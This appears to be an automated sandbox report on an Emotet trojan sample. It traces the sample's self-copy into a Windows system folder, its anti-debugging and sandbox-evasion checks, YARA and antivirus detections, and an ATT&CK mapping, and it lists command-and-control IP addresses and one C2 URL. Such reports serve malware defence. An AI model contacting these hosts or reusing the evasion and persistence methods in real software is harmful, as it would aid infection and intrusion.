                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeWindow detected: Number of UI elements: 11
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_00401D20 LoadLibraryW,GetProcAddress,1_2_00401D20
                    Source: NWMEaRqF7s.exeStatic PE information: real checksum: 0x5d872 should be: 0x5cbf3
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0042145D push ecx; ret 1_2_00421470
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0041B69C push 59FFFE78h; ret 1_2_0041B6A5
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0041F7C2 push ecx; ret 1_2_0041F7D5
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0042145D push ecx; ret 3_2_00421470
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0041B69C push 59FFFE78h; ret 3_2_0041B6A5
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0041F7C2 push ecx; ret 3_2_0041F7D5
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_022D974C push edx; ret 3_2_022D9761

                    Persistence and Installation Behavior:

                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Executable created and started: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe PE file moved: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe

                    Hooking and other Techniques for Hiding and Protection:

                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe File opened: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_00402130 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,1_2_00402130
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_004078B8 IsIconic,GetWindowPlacement,GetWindowRect,1_2_004078B8
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_00402130 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_00402130
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_004078B8 IsIconic,GetWindowPlacement,GetWindowRect,3_2_004078B8
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-31467
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeAPI coverage: 9.2 %
                    Source: C:\Windows\System32\svchost.exe TID: 5976 Thread sleep time: -150000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 5976 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_00410555 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_00410555
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_022528FB FindFirstFileW,FindNextFileW,FindClose,1_2_022528FB
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_00410555 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_00410555
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_023028FB FindFirstFileW,FindNextFileW,FindClose,3_2_023028FB
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0041E654 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,1_2_0041E654
                    Source: svchost.exe, 00000012.00000002.614751987.0000017D2A02A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW ?
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW(Yd%SystemRoot%\system32\mswsock.dll~y
                    Source: svchost.exe, 00000005.00000002.373440622.00000241EBF40000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.419273377.000001BBD3940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.436429626.0000023111660000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.472258673.0000017DE8400000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: svchost.exe, 00000012.00000002.617796585.0000017D2F863000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                    Source: dot3hc.exe, 00000003.00000003.435481620.00000000029F9000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.617740212.0000017D2F857000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000005.00000002.373440622.00000241EBF40000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.419273377.000001BBD3940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.436429626.0000023111660000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.472258673.0000017DE8400000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: svchost.exe, 00000005.00000002.373440622.00000241EBF40000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.419273377.000001BBD3940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.436429626.0000023111660000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.472258673.0000017DE8400000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: svchost.exe, 00000005.00000002.373440622.00000241EBF40000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.419273377.000001BBD3940000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.436429626.0000023111660000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.472258673.0000017DE8400000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeAPI call chain: ExitProcess graph end nodegraph_1-30587
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeAPI call chain: ExitProcess graph end nodegraph_3-33387
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_0041E5DF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041E5DF
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_00401D20 LoadLibraryW,GetProcAddress,1_2_00401D20
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_022537AF mov eax, dword ptr fs:[00000030h] 1_2_022537AF
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_02252EC1 mov eax, dword ptr fs:[00000030h] 1_2_02252EC1
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_02241030 mov eax, dword ptr fs:[00000030h] 1_2_02241030
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_023037AF mov eax, dword ptr fs:[00000030h] 3_2_023037AF
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_02302EC1 mov eax, dword ptr fs:[00000030h] 3_2_02302EC1
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_022D095E mov eax, dword ptr fs:[00000030h] 3_2_022D095E
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_022D466F mov eax, dword ptr fs:[00000030h] 3_2_022D466F
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_022D4F5D mov eax, dword ptr fs:[00000030h] 3_2_022D4F5D
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_022D0456 mov eax, dword ptr fs:[00000030h] 3_2_022D0456
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_022E1030 mov eax, dword ptr fs:[00000030h] 3_2_022E1030
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_0041F4E5 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,1_2_0041F4E5
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_0042936B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0042936B
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_0041E5DF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041E5DF
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_004276D9 __decode_pointer,SetUnhandledExceptionFilter,1_2_004276D9
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_004276B7 SetUnhandledExceptionFilter,__encode_pointer,1_2_004276B7
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_00424D0A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00424D0A
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_0042936B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0042936B
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_0041E5DF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041E5DF
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_004276D9 __decode_pointer,SetUnhandledExceptionFilter,3_2_004276D9
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_004276B7 SetUnhandledExceptionFilter,__encode_pointer,3_2_004276B7
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_00424D0A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00424D0A
                    Source: dot3hc.exe, 00000003.00000002.614889926.0000000000E00000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                    Source: dot3hc.exe, 00000003.00000002.614889926.0000000000E00000.00000002.00000001.sdmp Binary or memory string: Progman
                    Source: dot3hc.exe, 00000003.00000002.614889926.0000000000E00000.00000002.00000001.sdmp Binary or memory string: &Program Manager
                    Source: dot3hc.exe, 00000003.00000002.614889926.0000000000E00000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_0042C347 cpuid 1_2_0042C347
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,1_2_00403F0B
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,1_2_004313E8
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: GetLocaleInfoA,1_2_0042BDB0
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_00403F0B
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_004313E8
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: GetLocaleInfoA,3_2_0042BDB0
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_004273AA GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_004273AA
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_0042B089 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,1_2_0042B089
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_00404142 __EH_prolog3,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameA,GetVersion,RegOpenKeyExA,RegQueryValueExA,_sscanf,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,RegCloseKey,GetModuleHandleA,EnumResourceLanguagesA,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,_memset,1_2_00404142
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    Yara detected Emotet
                    Source: Yara match File source: 1.2.NWMEaRqF7s.exe.5a052e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.NWMEaRqF7s.exe.5a23ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.NWMEaRqF7s.exe.5a23ae.3.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.dot3hc.exe.22d052e.3.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.dot3hc.exe.22d052e.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.dot3hc.exe.22d23ae.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.dot3hc.exe.22d23ae.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.NWMEaRqF7s.exe.5a052e.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | Native API 11 | Path Interception | Process Injection 2 | Masquerading 121 | Input Capture 1 | System Time Discovery 2 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | LSASS Memory | Security Software Discovery 31 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 2 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 112 | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories 1 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | System Information Discovery 46 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label
                    NWMEaRqF7s.exe | 84% | Virustotal |
                    NWMEaRqF7s.exe | 68% | Metadefender |
                    NWMEaRqF7s.exe | 93% | ReversingLabs | Win32.Trojan.Emotet
                    NWMEaRqF7s.exe | 100% | Avira | TR/Crypt.Agent.fbupz

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    Source | Detection | Scanner | Label
                    3.2.dot3hc.exe.22d052e.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
                    1.2.NWMEaRqF7s.exe.2250000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    1.2.NWMEaRqF7s.exe.5a23ae.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    3.2.dot3hc.exe.22d23ae.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    3.2.dot3hc.exe.2300000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    1.2.NWMEaRqF7s.exe.5a052e.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2

                    Domains

                    No Antivirus matches

                    URLs


                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    https://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/ | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries


                                      Contacted IPs

                                      Public

                                      14061DIGITALOCEAN-ASNUStrue
                                      190.55.181.54
                                      unknownArgentina
                                      27747TelecentroSAARtrue
                                      203.153.216.189
                                      unknownIndonesia
                                      45291SURF-IDPTSurfindoNetworkIDtrue
                                      185.94.252.104
                                      unknownGermany
                                      197890MEGASERVERS-DEtrue
                                      5.39.91.110
                                      unknownFrance
                                      16276OVHFRtrue
                                      174.45.13.118
                                      unknownUnited States
                                      33588BRESNAN-33588UStrue
                                      137.119.36.33
                                      unknownUnited States
                                      11426TWC-11426-CAROLINASUStrue
                                      104.236.246.93
                                      unknownUnited States
                                      14061DIGITALOCEAN-ASNUStrue
                                      162.241.242.173
                                      unknownUnited States
                                      46606UNIFIEDLAYER-AS-1UStrue
                                      189.212.199.126
                                      unknownMexico
                                      6503AxtelSABdeCVMXtrue
                                      74.120.55.163
                                      unknownCanada
                                      32315WJBTN-ASCAtrue
                                      85.105.205.77
                                      unknownTurkey
                                      9121TTNETTRtrue
                                      200.114.213.233
                                      unknownArgentina
                                      10318TelecomArgentinaSAARtrue
                                      78.24.219.147
                                      unknownRussian Federation
                                      29182THEFIRST-ASRUtrue
                                      24.179.13.119
                                      unknownUnited States
                                      20115CHARTER-20115UStrue

                                      Private

                                      IP
                                      127.0.0.1

                                      General Information

                                      Joe Sandbox Version:32.0.0 Black Diamond
                                      Analysis ID:445260
                                      Start date:07.07.2021
                                      Start time:14:26:50
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 36s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:NWMEaRqF7s.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:22
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal88.troj.evad.winEXE@8/4@0/88
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 31.3% (good quality ratio 30.9%)
                                      • Quality average: 82.8%
                                      • Quality standard deviation: 21.8%
                                      HCA Information:
                                      • Successful, ratio: 77%
                                      • Number of executed functions: 90
                                      • Number of non-executed functions: 208
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.64.90.137, 23.35.237.194, 92.122.145.220, 40.88.32.150, 52.255.188.83, 20.82.210.154, 20.54.104.15, 40.112.88.60, 23.216.77.208, 23.216.77.209, 23.35.236.56, 20.50.102.62
                                      • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                      • Not all processes were analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      Time:14:28:35
                                      Type:API Interceptor
                                      Description:12x Sleep call for process: svchost.exe modified

                                      Joe Sandbox View / Context

                                      IPs


                                                    Domains

                                                    No context

                                                    ASN


                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4096
                                                    Entropy (8bit):0.5985616952512959
                                                    Encrypted:false
                                                    SSDEEP:6:bxlEk1GaD0JOCEfMuaaD0JOCEfMKQmDutAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bxNGaD0JcaaD0JwQQutAg/0bjSQJ
                                                    MD5:03AF445AADC662577CC5C2FF5CB493B7
                                                    SHA1:CAF3BB094A48999E762B45DBA7C7707FCFAF3807
                                                    SHA-256:E7E9CD897E3ACBF12EFC2A28D6861335BE1BB627D4E6995E1DA052958AF5F739
                                                    SHA-512:38650210C840D940C8519D250F53A6506FF1B726B6639D8B6D015D25F947EC06E1FDB2BCFC23AA3144A392DF4B1920A2E213B09382B0220E1A0DC78484D6F3A2
                                                    Malicious:false
                                                    Reputation:low
                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:Extensible storage user DataBase, version 0x620, checksum 0xcd0abd4e, page size 16384, DirtyShutdown, Windows version 10.0
                                                    Category:dropped
                                                    Size (bytes):32768
                                                    Entropy (8bit):0.09629373506277797
                                                    Encrypted:false
                                                    SSDEEP:6:gzwl/+Bi1lsXRIE11Y8TRX+/AXtlirJl8K+zwl/+Bi1lsXRIE11Y8TRX+/AXtli/:g0+BnXO4bl+PJqK+0+BnXO4bl+PJqK
                                                    MD5:E551646E6DF0D1EC8091815E27A33267
                                                    SHA1:1E0C77F449BA3CBABC2751156287545757027E59
                                                    SHA-256:A3FE928C06256DB6B779431F44A8D4AC7B113872D3018E66F1361FDE682B58D9
                                                    SHA-512:CA381E956BA55E86DA30EEABF560C0E4C13222361DEFF56B0003FE36308A295D9A209DC6255EC102EE453E8AF00C94CF5042DBD09AE83E4FD630841624956815
                                                    Malicious:false
                                                    Reputation:low
                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):8192
                                                    Entropy (8bit):0.10992535548958927
                                                    Encrypted:false
                                                    SSDEEP:3:om7Evt9wc8l/bJdAtiirrllAll:omirwc8t4ZrJlA
                                                    MD5:00E4E405495A0871AECE74A720C001CC
                                                    SHA1:1789C9324E434A77BE70F71E81E84DBFA4A24FAC
                                                    SHA-256:B82D2782DA52FE370AA83125766C0976A27792F3ECE36C24C3C2CF4FA6C54CF3
                                                    SHA-512:CA747EEFC99503060083DB6D38EE97E91C4E646D465FDCFC844FF725F3D25BFA8FD135F5AC74EDE16212B7B96FB7BABD18ADA6FB3006BB846D4A1B9684A70091
                                                    Malicious:false
                                                    Reputation:low
                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):55
                                                    Entropy (8bit):4.306461250274409
                                                    Encrypted:false
                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
